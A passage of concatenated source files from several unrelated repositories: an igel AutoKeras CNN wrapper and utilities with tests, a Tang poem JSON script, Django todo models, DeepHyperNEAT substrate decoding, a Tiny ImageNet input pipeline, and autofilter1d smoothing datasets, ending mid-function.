#### File: igel/auto/cnn.py ```python import json import logging import os import autokeras as ak from igel.auto.defaults import Defaults from igel.auto.models import Models from igel.constants import Constants from igel.utils import read_json, read_yaml from tensorflow.keras.models import load_model logger = logging.getLogger(__name__) class IgelCNN: defaults = Defaults() model = None dataset_props = {} model_props = {} model_args = {} training_args = {} results_path = Constants.results_dir def __init__(self, **cli_args): self.cmd: str = cli_args.get("cmd") self.data_path: str = cli_args.get("data_path") self.config_path: str = cli_args.get("yaml_path") self.task = cli_args.get("task") logger.info(f"Executing command: {self.cmd}") logger.info(f"Reading data from: {self.data_path}") logger.info(f"Reading yaml configs from: {self.config_path}") if self.cmd == "train": if not self.config_path: self.model_type = self.task else: self.file_ext: str = self.config_path.split(".")[1] if self.file_ext not in ["yaml", "yml", "json"]: raise Exception( "Configuration file can be a yaml or a json file!" ) self.configs: dict = ( read_json(self.config_path) if self.file_ext == "json" else read_yaml(self.config_path) ) self.dataset_props: dict = self.configs.get( "dataset", self.defaults.dataset_props ) self.model_props: dict = self.configs.get( "model", self.defaults.model_props ) self.training_args: dict = self.configs.get( "training", self.defaults.training_args ) self.model_args = self.model_props.get("arguments") self.model_type = self.task or self.model_props.get("type") else: self.model_path = cli_args.get( "model_path", self.defaults.model_path ) logger.info(f"path of the pre-fitted model => {self.model_path}") self.prediction_file = cli_args.get( "prediction_file", self.defaults.prediction_file ) # set description.json if provided: self.description_file = cli_args.get( "description_file", self.defaults.description_file ) # load description file to read stored training parameters with open(self.description_file) as f: dic = json.load(f) self.model_type: str = dic.get("task") # type of the model self.dataset_props: dict = dic.get( "dataset_props" ) # dataset props entered while fitting getattr(self, self.cmd)() def _create_model(self, *args, **kwargs): model_cls = Models.get(self.model_type) model = ( model_cls() if not self.model_args else model_cls(**self.model_args) ) return model def save_desc_file(self): desc = { "task": self.model_type, "model": self.model.__class__.__name__, "dataset_props": self.dataset_props or None, "model_props": self.model_props or None, } try: logger.info(f"saving fit description to {self.description_file}") with open(self.description_file, "w", encoding="utf-8") as f: json.dump(desc, f, ensure_ascii=False, indent=4) except Exception as e: logger.exception( f"Error while storing the fit description file: {e}" ) def save_model(self): exp_model = self.model.export_model() logger.info(f"model type: {type(exp_model)}") try: exp_model.save("model", save_format="tf") return True except Exception: exp_model.save(f"model.h5") def train(self): train_data = ak.image_dataset_from_directory(self.data_path) self.model = self._create_model() logger.info(f"executing a {self.model.__class__.__name__} algorithm...") logger.info(f"Training started...") self.model.fit(train_data, **self.training_args) logger.info("finished training!") self.save_desc_file() saved = self.save_model() if saved: logger.info(f"model saved successfully") def load_model(self): logger.info("loading model...") loaded_model = load_model("model", custom_objects=ak.CUSTOM_OBJECTS) logger.info("model loaded successfully") return loaded_model def evaluate(self): trained_model = self.load_model() test_data = ak.image_dataset_from_directory(self.data_path) trained_model.evaluate(test_data) def predict(self): trained_model = self.load_model() pred_data = ak.image_dataset_from_directory(self.data_path) trained_model.predict(pred_data) ``` #### File: igel/servers/helper.py ```python import logging import os logger = logging.getLogger(__name__) def remove_temp_data_file(f): """ remove temporary file, where request payload has been stored in order to be used by igel to generate predictions """ # remove temp file: if os.path.exists(f): logger.info(f"removing temporary file: {f}") os.remove(f) ``` #### File: igel/igel/utils.py ```python import json import logging import joblib import pandas as pd import yaml from igel.configs import configs from igel.data import metrics_dict, models_dict logger = logging.getLogger(__name__) def create_yaml(data, f): try: with open(f, "w") as yf: yaml.dump(data, yf, default_flow_style=False) except yaml.YAMLError as exc: logger.exception(exc) return False else: return True def read_yaml(f): with open(f) as stream: try: res = yaml.safe_load(stream) except yaml.YAMLError as exc: logger.exception(exc) else: return res def read_json(f): try: with open(f) as file: data = json.load(file) except Exception as e: logger.exception(e.args) else: return data def extract_params(config): assert ( "model" in config.keys() ), "model parameters need to be provided in the yaml file" assert ( "target" in config.keys() ), "target variable needs to be provided in the yaml file" model_params = config.get("model") model_type = model_params.get("type") algorithm = model_params.get("algorithm") target = config.get("target") if any(not item for item in [model_type, target, algorithm]): raise Exception("parameters in the model yaml file cannot be None") else: return model_type, target, algorithm def _reshape(arr): if len(arr.shape) <= 1: arr = arr.reshape(-1, 1) return arr def load_trained_model(f: str = ""): """ load a saved model from file @param f: path to model @return: loaded model """ try: if not f: logger.info(f"result path: {configs.get('results_path')} ") logger.info( f"loading model form {configs.get('default_model_path')} " ) with open(configs.get("default_model_path"), "rb") as _model: model = joblib.load(_model) else: logger.info(f"loading from {f}") with open(f, "rb") as _model: model = joblib.load(_model) return model except FileNotFoundError: logger.error(f"File not found in {configs.get('default_model_path')}") def load_train_configs(f=""): """ load train configurations from model_results/descriptions.json """ try: if not f: logger.info( f"loading descriptions.json form {configs.get('description_file')} " ) with open(configs.get("description_file"), "rb") as desc_file: training_config = json.load(desc_file) else: with open(f, "rb") as desc_file: training_config = json.load(desc_file) return training_config except FileNotFoundError as e: logger.error(f"File not found: {e}") except Exception as e: logger.error(e) def get_expected_scaling_method(training_config): """ get expected scaling method from the parsed training configuration (description.json) """ dataset_props = training_config.get("dataset_props") if not dataset_props: return preprocess_options = dataset_props.get("preprocess") if not preprocess_options: return scaling_options = preprocess_options.get("scale") if not scaling_options: return return scaling_options.get("method") def show_model_info(model_name: str, model_type: str): if not model_name: print(f"Please enter a supported model") print_models_overview() else: if not model_type: print( f"Please enter a type argument to get help on the chosen model\n" f"type can be whether regression, classification or clustering \n" ) print_models_overview() return if model_type not in ("regression", "classification", "clustering"): raise Exception( f"{model_type} is not supported! \n" f"model_type need to be regression, classification or clustering" ) models = models_dict.get(model_type) model_data = models.get(model_name) model, link, *cv_class = model_data.values() print( f"model type: {model_type} \n" f"model name: {model_name} \n" f"sklearn model class: {model.__name__} \n" f"{'-' * 60}\n" f"You can click the link below to know more about the optional arguments\n" f"that you can use with your chosen model ({model_name}).\n" f"You can provide these optional arguments in the yaml file if you want to use them.\n" f"link:\n{link} \n" ) def tableize(df): """ pretty-print a dataframe as table """ if not isinstance(df, pd.DataFrame): return df_columns = df.columns.tolist() max_len_in_lst = lambda lst: len(sorted(lst, reverse=True, key=len)[0]) align_center = ( lambda st, sz: "{0}{1}{0}".format(" " * (1 + (sz - len(st)) // 2), st)[ :sz ] if len(st) < sz else st ) align_right = ( lambda st, sz: "{}{} ".format(" " * (sz - len(st) - 1), st) if len(st) < sz else st ) max_col_len = max_len_in_lst(df_columns) max_val_len_for_col = { col: max_len_in_lst(df.iloc[:, idx].astype("str")) for idx, col in enumerate(df_columns) } col_sizes = { col: 2 + max(max_val_len_for_col.get(col, 0), max_col_len) for col in df_columns } build_hline = lambda row: "+".join( ["-" * col_sizes[col] for col in row] ).join(["+", "+"]) build_data = lambda row, align: "|".join( [ align(str(val), col_sizes[df_columns[idx]]) for idx, val in enumerate(row) ] ).join(["|", "|"]) hline = build_hline(df_columns) out = [hline, build_data(df_columns, align_center), hline] for _, row in df.iterrows(): out.append(build_data(row.tolist(), align_right)) out.append(hline) return "\n".join(out) def print_models_overview(): print(f"\nIgel's supported models overview: \n") reg_algs = list(models_dict.get("regression").keys()) clf_algs = list(models_dict.get("classification").keys()) cluster_algs = list(models_dict.get("clustering").keys()) df_algs = ( pd.DataFrame.from_dict( { "regression": reg_algs, "classification": clf_algs, "clustering": cluster_algs, }, orient="index", ) .transpose() .fillna("----") ) df = tableize(df_algs) print(df) ``` #### File: tests/test_igel/test_igel.py ```python import os import pytest from igel import Igel from .constants import Constants from .helper import remove_folder from .mock import MockCliArgs os.chdir(os.path.dirname(__file__)) @pytest.fixture def mock_args(): yield MockCliArgs remove_folder(Constants.model_results_dir) assert Constants.model_results_dir.exists() == False def test_fit(mock_args): """ test the fit model functionality """ assert mock_args is not None Igel(**mock_args.fit) assert Constants.model_results_dir.exists() == True assert Constants.description_file.exists() == True assert Constants.evaluation_file.exists() == False def test_export(mock_args): """ test the export model functionality """ assert mock_args is not None Igel(**mock_args.fit) Igel(**mock_args.export) assert Constants.onnx_model_file.exists() == True ```
{ "source": "0ssifrage/tang300", "score": 3 }
#### File: 0ssifrage/tang300/trim2.py ```python import json def main(): f = open('tang300.v3.json', 'r') ps = json.load(f) np = [] for p in ps: b = False if p[3][0][-1] == u',': t = [] for i in xrange(len(p[3])/2): t.append(p[3][2*i]+p[3][2*i+1]) p[3] = t np.append(p) f2 = open('tang300.v4.json', 'w') s = json.dumps(np, ensure_ascii=False, indent=2) f2.write(s.encode('utf-8')) f.close() f2.close() main() ```
{ "source": "0sw4l/Cuke", "score": 2 }
#### File: Cuke/TodoList/models.py ```python from django.db import models from django.contrib.auth.models import User class Cliente(User): titulo = ( ('Sr', 'Sr'), ('Srita', 'Srita'), ('Sra', 'Sra'), ('Don', 'Don'), ('Ingeniero', 'Ingeniero'), ('Doctor', 'Doctor')) tratamiento = models.CharField(max_length=15,choices=titulo,default=None) def __str__(self): return '{0} - {1}'.format(self.username, self.tratamiento) class Categoria(models.Model): nombre = models.CharField(max_length=10) def __str__(self): return self.nombre class Nota(models.Model): usuario = models.ForeignKey(Cliente) nota = models.CharField(max_length=50) categoria = models.ForeignKey(Categoria) lista = ( ('Urgente', 'Urgente'), ('Normal', 'Normal'), ('Relajao', 'Rejalao'), ('Pendiente', 'Pendiente'), ) prioridad = models.CharField(max_length=10,choices=lista,default=None) completada = models.BooleanField(default=False) def __str__(self): return self.nota ```
{ "source": "0T34/DeepHyperNEAT", "score": 3 }
#### File: DeepHyperNEAT/deep_hyperneat/decode.py ```python import numpy as np import itertools as it from deep_hyperneat.activations import ActivationFunctionSet from deep_hyperneat.phenomes import FeedForwardSubstrate import time def decode(cppn, input_dimensions, output_dimensions, sheet_dimensions=None): ''' Decodes a CPPN into a substrate. cppn -- CPPN input_dimensions -- dimensions of substrate input layer output_dimension -- dimensions of substrate output layer sheet_dimensions -- optional substrate sheet dimensions ''' # Create input layer coordinate map from specified input dimensions x = np.linspace(-1.0, 1.0, input_dimensions[1]) if (input_dimensions[1] > 1) else [0.0] y = np.linspace(-1.0, 1.0, input_dimensions[0]) if (input_dimensions[0] > 1) else [0.0] input_layer = list(it.product(x,y)) # Create output layer coordinate map from specified output dimensions x = np.linspace(-1.0,1.0,output_dimensions) if (output_dimensions > 1) else [0.0] y = [0.0] output_layer = list(it.product(x,y)) # Create sheet coordinate map from given sheet dimensions (if any) if sheet_dimensions: x = np.linspace(-1.0, 1.0, sheet_dimensions[1]) if (sheet_dimensions[1] > 1) else [0.0] y = np.linspace(-1.0, 1.0, sheet_dimensions[0]) if (sheet_dimensions[0] > 1) else [0.0] sheet = list(it.product(x,y)) else: sheet = input_layer # Create list of mappings to be created between substrate sheets connection_mappings = [cppn.nodes[x].cppn_tuple for x in cppn.output_nodes if cppn.nodes[x].cppn_tuple[0] != (1,1)] # Create substrate representation (dictionary of sheets and their respective coordinate maps) hidden_sheets = {cppn.nodes[node].cppn_tuple[0] for node in cppn.output_nodes} substrate = {s:sheet for s in hidden_sheets} substrate[(1,0)] = input_layer substrate[(0,0)] = output_layer substrate[(1,1)] = [(0.0,0.0)] # Create dictionary of output node IDs to their respective mapping tuples cppn_idx_dict = {cppn.nodes[idx].cppn_tuple:idx for idx in cppn.output_nodes} # Create the substrate return create_substrate(cppn, substrate, connection_mappings, cppn_idx_dict) def create_substrate(cppn, substrate, mapping_tuples, id_dict, act_func="relu"): ''' Creates a neural network from a CPPN and substrate representation. Based on PurePLES. Copyright (c) 2017 <NAME> & <NAME>. cppn -- CPPN substrate -- substrate representation (a dictionary of sheets and their respective coordinate maps) mapping_tuples -- list of mappings to be created between substrate sheets id_dict -- dictionary of output node IDs and their respective mapping tuples act_func -- optional argument for the activation function of the substrate ''' node_evals, layers = [], gather_layers(substrate) # Assign coordinates to input, output, and bias layers input_coordinates, output_coordinates, bias_coordinates = (substrate[(1,0)],(1,0)), (substrate[(0,0)],(0,0)), (substrate[(1,1)],(1,1)) # Assign ids to nodes in the substrate input_node_ids = list(range(len(input_coordinates[0]))) bias_node_ids = list(range(len(input_node_ids), len(input_node_ids+bias_coordinates[0]))) output_node_ids = list(range(len(input_node_ids+bias_node_ids), len(input_node_ids+bias_node_ids+output_coordinates[0]))) # Remove the input and output layers from the substrate dictionary del substrate[(1,0)], substrate[(0,0)], substrate[(1,1)] # Create hidden layer coordinate maps hidden_coordinates = [(substrate[k], k) for k in substrate.keys()] # Assign ids to nodes in all hidden layers number_of_hidden_nodes = sum([len(layer[0]) for layer in hidden_coordinates]) start_index = len(input_node_ids+output_node_ids+bias_node_ids) hidden_node_ids = list(range(start_index, start_index+number_of_hidden_nodes)) # Get activation function for substrate act_func_set = ActivationFunctionSet() hidden_activation = act_func_set.get(act_func) output_activation = act_func_set.get('linear') # Decode depending on whether there are hidden layers or not if hidden_node_ids: # Query CPPN for mapping between output layer and topmost hidden layer out_hid_mapping_tuples = [mapping for mapping in mapping_tuples if mapping[1] == (0,0)] out_node_counter, idx, hidden_idx = 0, 0, 0 # For each coordinate in output sheet for oc in output_coordinates[0]: # Adding Biases from Output to Hidden node_connections = query_cppn(cppn,oc,output_coordinates,bias_coordinates,bias_node_ids[0], id_dict) # For each connection mapping for mapping in out_hid_mapping_tuples: source_sheet_id = mapping[0] node_connections += query_cppn(cppn,oc,output_coordinates,(substrate[source_sheet_id],source_sheet_id), hidden_node_ids[idx], id_dict) idx += len(substrate[source_sheet_id]) if node_connections: node_evals.append((output_node_ids[out_node_counter], output_activation, sum, node_connections)) hidden_idx = idx idx = 0 out_node_counter += 1 # Query CPPN for mapping between hidden layers (from top to bottom) hid_node_counter = 0 next_idx = idx = hidden_idx # For each hidden layer in the substrate, going from top to bottom for layer_idx in range((len(layers)-1), 2, -1): # For each sheet in the current layer, i for sheet_idx in range(len(layers[layer_idx])): # Assign target sheet id target_sheet_id = layers[layer_idx][sheet_idx] hid_hid_mapping_tuple = [mapping for mapping in mapping_tuples if (mapping[1] == target_sheet_id)] # For each coordinate in target sheet for hc in substrate[target_sheet_id]: # Adding Biases from Hidden to Hidden node_connections = query_cppn(cppn,hc,(substrate[target_sheet_id],target_sheet_id),bias_coordinates,bias_node_ids[0], id_dict) for mapping in hid_hid_mapping_tuple: source_sheet_id = mapping[0] node_connections += query_cppn(cppn,hc,(substrate[target_sheet_id],target_sheet_id),(substrate[source_sheet_id], source_sheet_id),hidden_node_ids[idx], id_dict) idx += len(substrate[source_sheet_id]) if node_connections: node_evals.append((hidden_node_ids[hid_node_counter],hidden_activation,sum, node_connections)) hid_node_counter += 1 next_idx = idx idx = hidden_idx idx = next_idx hidden_idx = next_idx # Query CPPN for mapping between bottom hidden layer to input layer idx = 0 for i in range(len(layers[2])): # Assign target target_sheet_id = layers[2][i] # For each coordinate in target sheet for hc in substrate[target_sheet_id]: node_connections = query_cppn(cppn, hc, (substrate[target_sheet_id],target_sheet_id), input_coordinates, input_node_ids[idx], id_dict) # Adding Biases from Hidden to Input node_connections += query_cppn(cppn,hc,(substrate[target_sheet_id],target_sheet_id),bias_coordinates,bias_node_ids[0], id_dict) if node_connections: node_evals.append((hidden_node_ids[hid_node_counter],hidden_activation, sum,node_connections)) hid_node_counter += 1 # No hidden layers else: # Output Input Layer idx, counter = 0, 0 for i in range(len(layers[0])): # Assign target target_sheet_id = layers[0][i] # For each coordinate in target sheet for oc in output_coordinates[0]: node_connections = query_cppn(cppn,oc,output_coordinates,input_coordinates,input_node_ids[idx], id_dict) node_connections += query_cppn(cppn,oc,output_coordinates,bias_coordinates,bias_node_ids[idx], id_dict) if node_connections: node_evals.append((output_node_ids[counter],output_activation,sum,node_connections)) counter += 1 return FeedForwardSubstrate(input_node_ids, bias_node_ids, output_node_ids, node_evals) def query_cppn(cppn, source_coordinate, source_layer, target_layer, node_idx, id_dict, max_weight=5.0): ''' Given a single node's coordinates and a layer of nodes, query the CPPN for potential weights for all possible connections between the layer and the single node. Based on PurePLES. Copyright (c) 2017 <NAME> & <NAME>. cppn -- CPPN source_coordinate -- coordinate of single node to be connected to a set of nodes source_layer -- layer of nodes in which source_coordinate resides target_layer -- layer of nodes to which source_coordinate will be connected node_idx -- node index to begin on when traversing target_layer id_dict -- dictionary of CPPN output node ids and their respective mapping tuples ''' node_connections = [] target_coordinates = target_layer[0] target_layer_id = target_layer[1] source_layer_id = source_layer[1] mapping_tuple = (target_layer_id,source_layer_id) cppnon_id = id_dict[mapping_tuple] for target_coordinate in target_coordinates: i = [target_coordinate[0], target_coordinate[1], source_coordinate[0], source_coordinate[1]] w = cppn.activate(i)[cppnon_id] if abs(w) < max_weight: node_connections.append((node_idx, w*max_weight)) elif abs(w) > max_weight: node_connections.append((node_idx, max_weight)) else: node_connections.append((node_idx, 0.0)) node_idx += 1 return node_connections def gather_layers(substrate): ''' Takes a dictionary representation of a substrate and returns a list of the layers and the sheets within those layers. substrate -- dictionary representation of a substrate ''' layers = {} for i in range(len(substrate)): layers[i] = [] for key in substrate.keys(): if key[0] == i and key not in layers[i]: layers[i].append(key) if layers[i] == []: del layers[i] return layers ```
{ "source": "0three/CAAD-2018-Kunlin", "score": 2 }
#### File: CAAD-2018-Kunlin/datasets/tiny_imagenet_input.py ```python from __future__ import absolute_import from __future__ import division from __future__ import print_function import os from absl import flags import tensorflow as tf FLAGS = flags.FLAGS flags.DEFINE_string('tiny_imagenet_data_dir', None, 'Directory with Tiny Imagenet dataset in TFRecord format.') def tiny_imagenet_parser(value, image_size, is_training): """Parses tiny imagenet example. Args: value: encoded example. image_size: size of the image. is_training: if True then do training preprocessing (which includes random cropping), otherwise do eval preprocessing. Returns: image: tensor with the image. label: true label of the image. """ keys_to_features = { 'image/encoded': tf.FixedLenFeature((), tf.string, ''), 'label/tiny_imagenet': tf.FixedLenFeature([], tf.int64, -1), } parsed = tf.parse_single_example(value, keys_to_features) image_buffer = tf.reshape(parsed['image/encoded'], shape=[]) image = tf.image.decode_image(image_buffer, channels=3) image = tf.image.convert_image_dtype( image, dtype=tf.float32) # Crop image if is_training: bbox_begin, bbox_size, _ = tf.image.sample_distorted_bounding_box( tf.shape(image), bounding_boxes=tf.constant([0.0, 0.0, 1.0, 1.0], dtype=tf.float32, shape=[1, 1, 4]), min_object_covered=0.5, aspect_ratio_range=[0.75, 1.33], area_range=[0.5, 1.0], max_attempts=20, use_image_if_no_bounding_boxes=True) image = tf.slice(image, bbox_begin, bbox_size) # resize image image = tf.image.resize_bicubic([image], [image_size, image_size])[0] # Rescale image to [-1, 1] range. image = tf.multiply(tf.subtract(image, 0.5), 2.0) image = tf.reshape(image, [image_size, image_size, 3]) # Labels are in [0, 199] range label = tf.cast( tf.reshape(parsed['label/tiny_imagenet'], shape=[]), dtype=tf.int32) return image, label def tiny_imagenet_input(split, batch_size, image_size, is_training): """Returns Tiny Imagenet Dataset. Args: split: name of the split, "train" or "validation". batch_size: size of the minibatch. image_size: size of the one side of the image. Output images will be resized to square shape image_size*image_size. is_training: if True then training preprocessing is done, otherwise eval preprocessing is done.instance of tf.data.Dataset with the dataset. Raises: ValueError: if name of the split is incorrect. Returns: Instance of tf.data.Dataset with the dataset. """ if split.lower().startswith('train'): filepath = os.path.join(FLAGS.tiny_imagenet_data_dir, 'train.tfrecord') elif split.lower().startswith('validation'): filepath = os.path.join(FLAGS.tiny_imagenet_data_dir, 'validation.tfrecord') else: raise ValueError('Invalid split: %s' % split) dataset = tf.data.TFRecordDataset(filepath, buffer_size=8*1024*1024) if is_training: dataset = dataset.shuffle(10000) dataset = dataset.repeat() dataset = dataset.apply( tf.contrib.data.map_and_batch( lambda value: tiny_imagenet_parser(value, image_size, is_training), batch_size=batch_size, num_parallel_batches=4, drop_remainder=True)) def set_shapes(images, labels): """Statically set the batch_size dimension.""" images.set_shape(images.get_shape().merge_with( tf.TensorShape([batch_size, None, None, None]))) labels.set_shape(labels.get_shape().merge_with( tf.TensorShape([batch_size]))) return images, labels # Assign static batch size dimension dataset = dataset.map(set_shapes) dataset = dataset.prefetch(tf.contrib.data.AUTOTUNE) return dataset def num_examples_per_epoch(split): """Returns the number of examples in the data set. Args: split: name of the split, "train" or "validation". Raises: ValueError: if split name is incorrect. Returns: Number of example in the split. """ if split.lower().startswith('train'): return 100000 elif split.lower().startswith('validation'): return 10000 else: raise ValueError('Invalid split: %s' % split) ```
{ "source": "0tika/twitch.py", "score": 2 }
#### File: twitch.py/twitch/event_handler.py ```python import logging import asyncio from functools import partial from .events import Event log = logging.getLogger(__name__) class _EventTask(asyncio.Task): def __init__(self, original_coro, event_name, coro, *, loop): super().__init__(coro, loop=loop) self.__event_name = event_name self.__original_coro = original_coro def __repr__(self): info = [ ('state', self._state.lower()), ('event', self.__event_name), ('coro', repr(self.__original_coro)), ] if self._exception is not None: info.append(('exception', repr(self._exception))) task = ' '.join(f'{t}={t}' for t in info) return f'<EventTask {task}>' class EventHandler: def __init__(self, loop): self.loop = loop self._listeners = {} self._handlers = {Event.CONNECTED: self._handle_connected} self._connected = asyncio.Event(loop=self.loop) def __getitem__(self, event): try: listener = self._listeners[event] except KeyError: listener = [] self._listeners[event] = listener return listener def register(self, event, coro): real_coro = coro.func if isinstance(coro, partial) else coro coro_name = real_coro.__name__ if not asyncio.iscoroutinefunction(real_coro): raise TypeError( f'{coro_name} ' f'must be a coroutine function to be registered') event = f'on_{event}' if not event.startswith('on_') else event def get_name(coro): return coro.func.__name__ if isinstance(coro, partial) else \ coro.__name__ coros = getattr(self, event, []) # ensure the same on_message coro can't be registered twice if coro_name not in [get_name(c) for c in coros]: coros.append(coro) setattr(self, event, coros) def emit(self, event, *args, **kwargs): handler = self._handlers.get(event) if handler: log.info(f'invoking custom handler for {event}') handler() log.info(f'emitting event {event}') method = f'on_{event}' listeners = self._listeners.get(event) if listeners: removed = [] for i, (future, condition) in enumerate(listeners): if future.cancelled(): removed.append(i) continue try: result = condition(*args) except Exception as exc: future.set_exception(exc) removed.append(i) else: if result: if len(args) == 0: future.set_result(None) elif len(args) == 1: future.set_result(args[0]) else: future.set_result(args) removed.append(i) if len(removed) == len(listeners): self._listeners.pop(event) else: for idx in reversed(removed): del listeners[idx] try: coros = getattr(self, method) self._schedule_event(coros, method, *args, **kwargs) except AttributeError: pass def _schedule_event(self, coros, event_name, *args, **kwargs): # schedule the tasks for wrapped_coro, coro in [ (_run_event(coro, event_name, *args, **kwargs), coro) for coro in coros]: _EventTask(original_coro=coro, event_name=event_name, coro=wrapped_coro, loop=self.loop) @property def connected(self): return self._connected def clear_connected(self): self._connected.clear() def _handle_connected(self): self._connected.set() async def _on_run_error(method, err): log.info(f'ignoring exception in {method}: {err}') async def _run_event(coro, event_name, *args, **kwargs): try: await coro(*args, **kwargs) except asyncio.CancelledError: pass except Exception as e: try: await _on_run_error(event_name, str(e)) except asyncio.CancelledError: pass ```
{ "source": "0todd0000/autofilter1d", "score": 3 }
#### File: autofilter1d/smooth1d/datasets.py ```python from math import pi,sin import numpy as np dataset_names = ['Challis1999a', 'Challis1999b', 'Challis1999c', 'Challis1999d', 'Challis1999e', 'Null', 'Vaughan1982'] class _Dataset(object): ''' Abstract template class for all datasets ''' author = None #Author's name name = None #Dataset name year = None #Year of publication / dissemination y = None #The 1D datum continuum t = None #Time vector dt = None #Duration between time nodes (s) hz = None #Sample frequency (Hz) def get_data(self): ''' Get time vector and 1D datum continuum Arguments: (None) Returns: *t* : time vector (1D NumPy array) *y* : 1D datum continuum (1D NumPy array) ''' return self.t, self.y def get_name(self): ''' Get dataset name. Arguments: (None) Returns: *s* : dataset name (str) ''' s = self.author if self.year is not None: s += ' (%s)' %self.year if self.name is not None: s += ' %s' %self.name return s def get_namep(self): s = self.author if self.year is not None: s += ' %s' %self.year if self.name is not None: s += ' %s' %self.name return s class Null(_Dataset): ''' A null 1D datum; y(q)=0 for all q ''' def __init__(self): self.author = 'Null' self.name = None self.year = None self.t = np.linspace(0, 1, 101) self.y = np.zeros(101) self.dt = 0.01 self.hz = 1 / self.dt class Vaughan1982(_Dataset): ''' Data available in Vaughan (1982, p.379, Table 1,) Vaughan CL (1982). Smoothing and differentiation of displacement-time data: an application of splines and digital filtering. International Journal of Bio-Medical Computing 13, 375–386. ''' def __init__(self): self.author = 'Vaughan' self.name = None self.year = 1982 self.y = np.array([1.770,1.757,1.748,1.740,1.726, 1.715,1.698,1.683,1.667,1.651,1.632,1.612,1.593,1.572,1.551,1.530,1.507,1.483,1.445,1.428,1.401,1.371,1.343,1.311,1.279,1.245,1.212,1.175,1.143,1.105,1.063,1.029,0.991,0.953,0.910,0.869,0.823,0.779,0.732,0.691,0.644,0.595,0.548,0.501,0.447,0.395,0.350,0.294,0.243,0.185]) self.dt = 0.00985 self.hz = 1 / self.dt self.t = self.dt * np.arange( self.y.size ) class _Challis1999(_Dataset): CONST_W0 = 2 * pi CONST_A = np.array([16, 12, 6.3, 0.5, 1.2, 0.6, 0.3, 0.2, 0.1, 0.09, 0.04, 0.06, 0.01]) CONST_PHI = np.array([0.99, 0.23, -2.97, 0.0, -3.13, -0.84, 2.14, 0.58, 1.15, 0.17, -1.13, 0.76, -1.21]) author = 'Challis' year = 1999 def __init__(self): self.dt = self.t[1] - self.t[0] self.hz = 1 / self.dt def get_namep(self): return '%s %s, Dataset %s' %(self.author, self.year, self.name) class Challis1999A(_Challis1999): ''' Dataset A from: <NAME> (1999). A procedure for the automatic determination of filter cutoff frequency for the processing of biomechanical data. Journal of Applied Biomechanics 15, 303-317. ''' def __init__(self): w0,a,phi = self.CONST_W0, self.CONST_A, self.CONST_PHI self.name = 'A' self.t = np.linspace(0, 1, 91) self.y = np.array([(a * np.sin( np.arange(1,14) * w0 * tt + phi)).sum() for tt in self.t]) super().__init__() class Challis1999B(_Challis1999): ''' Dataset B from: <NAME> (1999). A procedure for the automatic determination of filter cutoff frequency for the processing of biomechanical data. Journal of Applied Biomechanics 15, 303-317. ''' def __init__(self): self.name = 'B' self.t = np.linspace(0, 1, 91) self.y = self._get_y() super().__init__() def _get_y(self): w0,a,phi = self.CONST_W0, self.CONST_A, self.CONST_PHI t = self.t n,k,dt = t.size, 40.0, t[1] - t[0] p = (dt * (n-1)) - (0.5*dt) f = [] for tt in t: ff = k * (tt- 0.5*p)**2 for i,(aa,pphi) in enumerate( zip(a,phi) ): ff += (aa) * sin( (i+1) * w0 * tt + pphi) f.append(ff) return np.array(f) class Challis1999C(_Challis1999): ''' Dataset C from: <NAME>H (1999). A procedure for the automatic determination of filter cutoff frequency for the processing of biomechanical data. Journal of Applied Biomechanics 15, 303-317. ''' def __init__(self): self.name = 'C' self.t = np.linspace(0, 1, 91) self.y = self._get_y() super().__init__() def _get_y(self): t = self.t f = np.zeros(t.size) i0 = t <= 0.85 i1 = t > 0.85 f[i0] = (-55.1 * t[i0]) + (427 * t[i0]**3) + (-342 * t[i0]**4) f[i1] = 579.97 - (304.32 * t[i1]) + (-241.77 * t[i1]**-1) return np.array(f) class Challis1999D(_Challis1999): ''' Dataset D from: <NAME>H (1999). A procedure for the automatic determination of filter cutoff frequency for the processing of biomechanical data. Journal of Applied Biomechanics 15, 303-317. ''' def __init__(self): self.name = 'D' self.t = np.linspace(0, 5, 200) self.y = self._get_y() super().__init__() def _get_y(self): t = self.t f = np.zeros(t.size) i0 = t <= 4. i1 = t > 4.0 f[i0] = pi**-2 * np.sin( pi * t[i0] ) f[i1] = pi**-1 * ( t[i1] - 4 ) return f class Challis1999E(_Challis1999): ''' Dataset E from: <NAME> (1999). A procedure for the automatic determination of filter cutoff frequency for the processing of biomechanical data. Journal of Applied Biomechanics 15, 303-317. ''' def __init__(self): self.name = 'E' self.t = np.linspace(0, 1, 128) self.y = self._get_y() super().__init__() def _get_y(self): t = self.t B = 10000 f = B * t**2 * (t-0.1) * (t-0.2) * (t-0.5) * (t-0.75) * (t-0.95) * (t-1)**2 + t**2 return f dataset_classes = [Null, Vaughan1982, Challis1999A, Challis1999B, Challis1999C, Challis1999D, Challis1999E] def load(datasetname): assert isinstance(datasetname, str) and (datasetname in dataset_names), 'datasetname must be one of %s' %dataset_names if datasetname=='Null': dataset = Null() if datasetname=='Challis1999a': dataset = Challis1999A() elif datasetname=='Challis1999b': dataset = Challis1999B() elif datasetname=='Challis1999c': dataset = Challis1999C() elif datasetname=='Challis1999d': dataset = Challis1999D() elif datasetname=='Challis1999e': dataset = Challis1999E() elif datasetname=='Vaughan1982': dataset = Vaughan1982() else: raise( ValueError('Unknown dataset name: %s' %datasetname) ) t,y = dataset.get_data() return t,y ``` #### File: autofilter1d/smooth1d/smooth.py ```python import os import ctypes from math import sqrt,log import numpy as np import scipy.signal from statsmodels.robust import mad import pywt from . import util round_up_to_odd = util.round_up_to_odd paddon = util.paddon paddoff = util.paddoff def butter_lowpass(y, dt, cutoff, order=2): ''' Lowpass Butterworth filter INPUTS: *y* : 1D measurement ( (Q,) array ) *dt* : inter-node duration = (1 / sampling frequency) *cutoff* : cut-off frequency (Hz) (int or float) *order* : filter order (int) OUTPUTS: *ys* : smoothed 1D measurement ( (Q,) array ) ''' cutoff = cutoff / ( 2**0.5 - 1 ) ** (0.5/order) b,a = scipy.signal.butter(order, 2*cutoff*dt, btype='lowpass') fdata = scipy.signal.filtfilt( b, a, y, padtype='odd') return fdata def embed(time, y, cutoffs=None, order=2): ''' Embed a measurement in an abstract 2D time-cutoff space INPUTS: *time* : 1D time vector ( (Q,) array ) *y* : 1D measurement ( (Q,) array ) *cutoffs* : cut-off frequencies (Hz) (list of int or float) *order* : filter order (int) OUTPUTS: *Ys* : smoothed, embedded 1D measurement ( (J,Q) array ) ''' dt = time[1] - time[0] cutoffs = cutoffs if cutoffs is not None else np.linspace(5, 10, 50) ncut = cutoffs.size if y.ndim == 1: ye = np.array([butter_lowpass(y, dt, xx, order=order) for xx in cutoffs]) elif y.ndim == 2: J,Q = y.shape ye = np.zeros( (J,ncut,Q) ) for i,xx in 